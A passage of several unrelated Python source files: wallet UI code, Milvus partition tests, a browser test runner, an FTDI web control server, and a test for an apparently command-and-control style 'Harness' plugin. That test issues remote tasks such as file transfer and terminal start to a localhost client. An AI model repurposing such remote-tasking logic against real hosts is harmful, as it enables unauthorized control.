check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
try:
new_path = self.wallet.save_backup()
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
test_partition.py
|
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition, its owner collection name not existed in db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_name_name_None(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.L0)
def test_create_different_partition_names(self, connect, collection):
"""
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
"""
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
browserTest.py
|
#:copyright: Copyright 2009-2010 by the Vesper team, see AUTHORS.
#:license: Dual licenced under the GPL or Apache2 licences, see LICENSE.
import webbrowser, unittest
import multiprocessing, random, tempfile, os.path
from vesper.utils import Uri
from vesper.backports import json
from vesper import app
from vesper.web.route import Route
def startVesperInstance(port, queue):
try:
import coverage, sys, signal, atexit
coverage.process_startup()
def safeterminate(num, frame):
#coverage registers an atexit function
#so have atexit functions called when terminating
atexit._run_exitfuncs() #for some reason sys.exit isn't calling this
sys.exit()
signal.signal(signal.SIGTERM, safeterminate)
except ImportError:
pass
@app.Action
def sendServerStartAction(kw, retVal):
# print "startReplication callback!"
queue.put('server ready')
@Route('testresult')#, REQUEST_METHOD='POST')
def handleTestresult(kw, retval):
queue.put(json.loads(kw._postContent))
kw._responseHeaders['Content-Type'] = 'application/json'
return '"OK"'
tmpdir = tempfile.gettempdir()
print "creating vesper instance on port %d" % (port),'tmp at', tmpdir
app.createApp(__name__, 'vesper.web.admin', port=port, storage_url="mem://",
static_path='browser',
actions = {'load-model':[sendServerStartAction]},
template_path='browser/templates',
mako_module_dir = os.path.join(tmpdir, 'browserTest_makomodules')
).run()
# blocks forever
def startServer():
port = 5555 #random.randrange(5000,9999)
queue = multiprocessing.Queue()
serverProcess = multiprocessing.Process(target=startVesperInstance, args=(port,queue))
serverProcess.start()
return serverProcess, queue, port
def run():
serverProcess, queue, port = startServer()
queue.get(True, 5) # raises queue.Empty if server isn't ready in 5 seconds
try:
serverProcess.join() #block
except:
serverProcess.terminate()
class BrowserTestRunnerTest(unittest.TestCase):
def testBrowserTests(self):
serverProcess, queue, port = startServer()
urls = ['static/db_tests.html', 'static/binder_tests.html','data_test.html']
try:
queue.get(True, 5) # raises queue.Empty if server isn't ready in 5 seconds
for name in urls:
url = 'http://localhost:%d/%s' % (port, name)
print 'running ', url
webbrowser.open(url)
testResults = queue.get(True, 20) # raises queue.Empty if browser unittests haven't finished in 20 seconds
print '%(total)d total, %(passed)d passed %(failed)d failed %(ignored)d ignored' % testResults
self.assertEqual(testResults['passed'], testResults['total'])
finally:
if not keepRunning:
serverProcess.terminate()
else:
try:
serverProcess.join() #block
except:
serverProcess.terminate()
keepRunning = False
if __name__ == '__main__':
import sys
if '--run' in sys.argv:
run()
sys.exit()
elif '--wait' in sys.argv:
keepRunning = True
sys.argv.remove('--wait')
unittest.main()
|
bit_server.py
|
"""
bit_server.py - remote HTTP interface to a bit-banged FTDI port
This runs as a web server, connect to port 8008
Change HTTP_PORT for different port number or supply alternate as args[1]
Requires:
- pylibftdi
"""
import sys
import threading
import time
import webbrowser
from http.server import HTTPServer, BaseHTTPRequestHandler
from io import BytesIO
from socketserver import ThreadingMixIn
from pylibftdi import BitBangDevice
HTTP_PORT = 8008
class ThreadingServer(ThreadingMixIn, HTTPServer):
pass
def get_page():
port = switch.port
page = """
<!DOCTYPE html>
<html>
<head>
<title>%s - pylibftdi</title>
</head>
<body>
<div>
""" % port
for i in range(8):
bit = 7 - i
is_on = port & (1 << bit)
color = '#00FF00' if is_on else '#FF0000'
page += """
<fieldset style="background-color: %s; display: inline-block; margin:0px; padding: 8px;">
<form action="" method="post" >
<input type="checkbox" onchange="document.querySelector('[name=bit%d]').value=this.checked; document.forms[%d].submit()" %s />
<input type="hidden" name="bit%d" />
</form>
</fieldset>
""" % (color, bit, i, 'checked="checked"' if is_on else '', bit)
page += """
</div>
DATA=%s
</body>
</html>
""" % port
return page
class ReqHandler(BaseHTTPRequestHandler):
def do_GET(self):
f = self.send_head()
if f:
self.wfile.write(f.read())
f.close()
def do_POST(self):
length = self.headers['content-length']
nbytes = int(length)
query = self.rfile.read(nbytes).decode()
# this is lazy and fragile - assumes only a single
# query parameter XXX
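# A sturdier alternative (comment-only sketch, not wired in here) would let
# the standard library do the parsing instead of slicing characters; "params"
# below is a hypothetical local name:
#
#     from urllib.parse import parse_qs
#     params = parse_qs(query)              # e.g. {'bit3': ['true']}
#     for name, values in params.items():
#         if name.startswith('bit') and name[3:].isdigit():
#             bit, on = int(name[3:]), values[-1] == 'true'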
if query.startswith('bit'):
bit = int(query[3])
value = 1 if query.rsplit('=', 1)[-1] == 'true' else 0
if value:
switch.port |= (1 << bit)
else:
switch.port &= 255 ^ (1 << bit)
f = self.send_head()
if f:
self.wfile.write(f.read())
f.close()
def send_head(self):
f = BytesIO()
f.write(get_page().encode())
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def runserver(port=HTTP_PORT):
serveraddr = ('', port)
srvr = ThreadingServer(serveraddr, ReqHandler)
srvr.serve_forever()
if __name__ == '__main__':
switch = BitBangDevice()
try:
HTTP_PORT = int(sys.argv[1])
except (ValueError, TypeError):
print("Usage: FtdiWebServer [portnumber]")
except IndexError:
pass
t = threading.Thread(target=runserver, args=(HTTP_PORT,))
t.daemon = True
t.start()
print("Webserver running on localhost port %d" % HTTP_PORT)
time.sleep(0.5)
retry = 10
while retry:
try:
webbrowser.open('http://localhost:%d' % HTTP_PORT)
except EnvironmentError:
time.sleep(1)
retry -= 1
else:
break
# wait for Ctrl-C
try:
while 1:
time.sleep(100)
except KeyboardInterrupt:
pass
|
test_03_harness_app.py
|
"""Unit testing for the supervisor module.
"""
from multiprocessing import Pool, Process
from os import environ
from time import sleep
from pytest import fixture, raises
import docker
CLIENT = docker.from_env()
from src import controller_plugin
@fixture(scope="function")
def startup_brain():
old_log = environ.get("LOGLEVEL", "")
environ["LOGLEVEL"] = "DEBUG"
tag = environ.get("TRAVIS_BRANCH", "dev").replace("master", "latest")
CLIENT.containers.run(
"".join(("ramrodpcp/database-brain:", tag)),
name="rethinkdbtestapp",
detach=True,
ports={"28015/tcp": 28015},
remove=True,
)
sleep(3) #docker needs to start up the DB before sup starts up
yield
try:
environ["LOGLEVEL"] = old_log
containers = CLIENT.containers.list()
for container in containers:
if container.name == "rethinkdbtestapp":
container.stop()
break
except SystemExit:
pass
@fixture(scope="function")
def proc():
old_plugin = environ.get("PLUGIN", "")
old_plugin_name = environ.get("PLUGIN_NAME", "")
old_stage = environ.get("STAGE", "")
old_port = environ.get("PORT", "")
environ["PLUGIN"] = "Harness"
environ["PLUGIN_NAME"] = "Harness-5000tcp"
environ["STAGE"] = "TESTING"
environ["PORT"] = "5000"
import server
plugin_instance = server.get_class_instance("Harness")
process = Process(target=plugin_instance.start)
yield process
try:
process.terminate()
except:
pass
environ["PLUGIN"] = old_plugin
environ["PLUGIN_NAME"] = old_plugin_name
environ["STAGE"] = old_stage
environ["PORT"] = old_port
TEST_COMMANDS = [
{'Output': True,
'Inputs': [{'Tooltip': 'This string will be echoed back',
'Type': 'textbox',
'Name': 'EchoString',
'Value': 'Hello World!'}],
'Tooltip': '\nEcho\n\nClient Returns this string verbatim\n\nArguments:\n1. String to Echo\n\nReturns:\nString\n',
'CommandName': 'echo',
'OptionalInputs': []
},
{'Output': False,
'Inputs': [{'Tooltip': 'Integer number of milliseconds',
'Type': 'textbox',
'Name': 'SleepTime',
'Value': '1500'}],
'Tooltip': '',
'CommandName': 'sleep',
'OptionalInputs': []
},
{'Output': False,
'Inputs': [],
'Tooltip': '',
'CommandName': 'put_file',
'OptionalInputs': [{'Tooltip': '',
'Type': 'textbox',
'Name': 'file_id',
'Value': '399'},
{'Tooltip': '',
'Type': 'textbox',
'Name': 'filename',
'Value': 'test_file'}
]
},
{'Output': False,
'Inputs': [],
'Tooltip': '',
'CommandName': 'get_file',
'OptionalInputs': [{'Tooltip': '',
'Type': 'textbox',
'Name': 'fid',
'Value': '405'},
{'Tooltip': '',
'Type': 'textbox',
'Name': 'filename',
'Value': 'test_file'}]
},
{'Output': False,
'Inputs': [],
'Tooltip': '\nTerminate\n\nClient closes itself with exit code 0\n\nArguments:\nNone\n\nReturns:\nNone\n',
'CommandName': 'terminate',
'OptionalInputs': []
},
{'Output': False,
'Inputs': [],
'Tooltip': '',
'CommandName': 'terminal_start',
'OptionalInputs': []
},
]
def the_pretend_getter(client):
import requests
from requests.exceptions import ReadTimeout
from brain import rethinkdb as r
MAX_REQUEST_TIMEOUT = 120
try:
resp = requests.get("http://{}/harness/testing_testing_testing?args=First".format(client), timeout=MAX_REQUEST_TIMEOUT)
# better be an echo of "Hello World!"
print(resp.text)
assert("echo" in resp.text), "Expected First command to be echo"
requests.post("http://{}/response/testing_testing_testing".format(client), data={"data": resp.text[5:]}, timeout=MAX_REQUEST_TIMEOUT)
sleep(5) #make sure all the updates get made
conn = r.connect()
for doc in r.db("Brain").table("Outputs").run(conn):
assert (doc['Content'] == "Hello World!")
#confirm hello makes it to the database
resp = requests.get("http://{}/harness/testing_testing_testing?args=Second".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("sleep" in resp.text), "Expected second command to be sleep"
sleep(3) #make sure all the updates get made
resp = requests.get("http://{}/harness/testing_testing_testing?args=Third".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
#confirm put_file
assert("put_file" in resp.text), "Expected second command to be put_file"
resp = requests.get("http://{}/givemethat/testing_testing_testing/399?args=Fourth".format(client), timeout=MAX_REQUEST_TIMEOUT)
sleep(3) #make sure all the updates get made
#confirm get_file makes it to the database
resp = requests.get("http://{}/harness/testing_testing_testing?args=Fifth".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("get_file" in resp.text), "Expected second command to be get_file"
resp = requests.post("http://{}/givemethat/testing_testing_testing/401?args=Sixth".format(client), data={"data":"this is a file"}, timeout=MAX_REQUEST_TIMEOUT)
sleep(3) #make sure all the updates get made
resp = requests.get("http://{}/harness/testing_testing_testing?args=Seventh".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("terminate" in resp.text), "Expected third command to be terminate"
sleep(3) # make sure all the updates get made
resp = requests.get("http://{}/harness/testing_testing_testing?args=Eight".format(client),
timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert ("terminal_start" in resp.text), "Expected third command to be terminal_start"
resp = requests.get("http://{}/harness/testing_testing_testing?args=NoCommandsForMe".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("sleep" in resp.text), "Server should respond with sleep if no other command provided"
assert("1000" in resp.text), "Sleep should be small now that terminal started"
        sleep(8)  # give all the updates time to land before checking job status
for doc in r.db("Brain").table("Jobs").run(conn):
assert (doc['Status'] == "Done")
except AssertionError as e:
from sys import stderr
stderr.write("{}\n".format(e))
return False
except ReadTimeout:
#this is for manual debugging
sleep(300)
return False
return True
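# the_pretend_app drives the fake client against the locally running Harness
# instance at 127.0.0.1:5000 from a small process pool and fails if any worker
# reports a failure.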
def the_pretend_app():
sleep(6)
with Pool(2) as p:
test_results = p.map(the_pretend_getter, ["127.0.0.1:5000"])
assert False not in test_results
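# End-to-end test: start the Harness plugin process, insert each TEST_COMMANDS
# entry into the Brain "Jobs" table as a Ready job, then run the fake client,
# which performs the actual assertions (including that every job ends up Done).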
def test_the_Harness_app(startup_brain, proc):
environ["STAGE"] = "TESTING"
environ["PORT"] = "5000"
proc.start()
sleep(3)
try:
from brain import connect, r
conn = connect()
sleep(5)
job_start = 0
for command in TEST_COMMANDS:
job_start += 1
job_target = {"PluginName": "Harness",
"Location": "127.0.0.1",
"Port": "5000"}
job = {"JobTarget": job_target,
"Status": "Ready",
"StartTime": job_start,
"JobCommand": command}
print(job)
r.db("Brain").table("Jobs").insert(job).run(conn)
sleep(4)
the_pretend_app()
sleep(5)
raise KeyboardInterrupt
except KeyboardInterrupt:
pass
finally:
try:
proc.terminate()
sleep(2)
except SystemExit as ex:
assert str(ex) == "0"
if __name__ == "__main__":
test_the_Harness_app()
|
node_test.py
|
# Lint as: python3
# Copyright 2020 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for launchpad.nodes.courier.node."""
import datetime
import sys
import threading
from unittest import mock
from absl.testing import absltest
import courier
from launchpad.launch.test_multi_threading import address_builder
from launchpad.nodes.courier import node as lp_courier
class Server(object):
"""Terminates once it receives the first ping() call."""
def __init__(self):
self._server = None # type: courier.Server
self._has_ping = threading.Event()
def ping(self):
self._has_ping.set()
return 'pong'
def set_courier_server(self, server: courier.Server):
self._server = server
def run(self):
self._server.Start()
self._has_ping.wait()
self._server.Stop()
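# test_ping_pong wraps Server in a CourierNode, binds its address, runs the node
# in a background thread, and calls ping() through a dereferenced handle; the
# Server shuts itself down after the first ping. test_cyclic_reference checks
# that configuring two nodes with each other's handles records the handles in
# both nodes' _input_handles.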
class CourierNodeTest(absltest.TestCase):
def test_ping_pong(self):
node = lp_courier.CourierNode(Server)
handle = node.create_handle()
# Bind all addresses
address_builder.bind_addresses([node])
threading.Thread(target=node.run).start()
client = handle.dereference()
